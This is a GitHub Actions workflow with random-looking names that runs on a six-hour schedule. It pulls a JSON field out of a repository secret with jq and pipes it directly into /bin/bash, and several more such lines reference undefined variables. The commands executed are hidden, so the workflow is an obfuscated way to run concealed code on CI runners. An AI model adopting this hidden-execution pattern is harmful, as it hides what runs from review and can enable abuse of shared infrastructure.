name: chuanssu
on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chuanssu
        env:
          thbcs886: ${{ secrets.thbcs886 }}
        run: |
          echo $thbcs886 | jq -r .btjd847 | /bin/bash
          echo $xpcpe538 | jq -r .ofca920 | /bin/bash
          echo $l795 | jq -r .rrqm2 | /bin/bash
          echo $w46 | jq -r .uyqkd83281 | /bin/bash
          echo $hlzsc88849 | jq -r .a2399 | /bin/bash
          echo $fe18 | jq -r .gge05 | /bin/bash
          echo $pfnt1120 | jq -r .gmhwd4 | /bin/bash

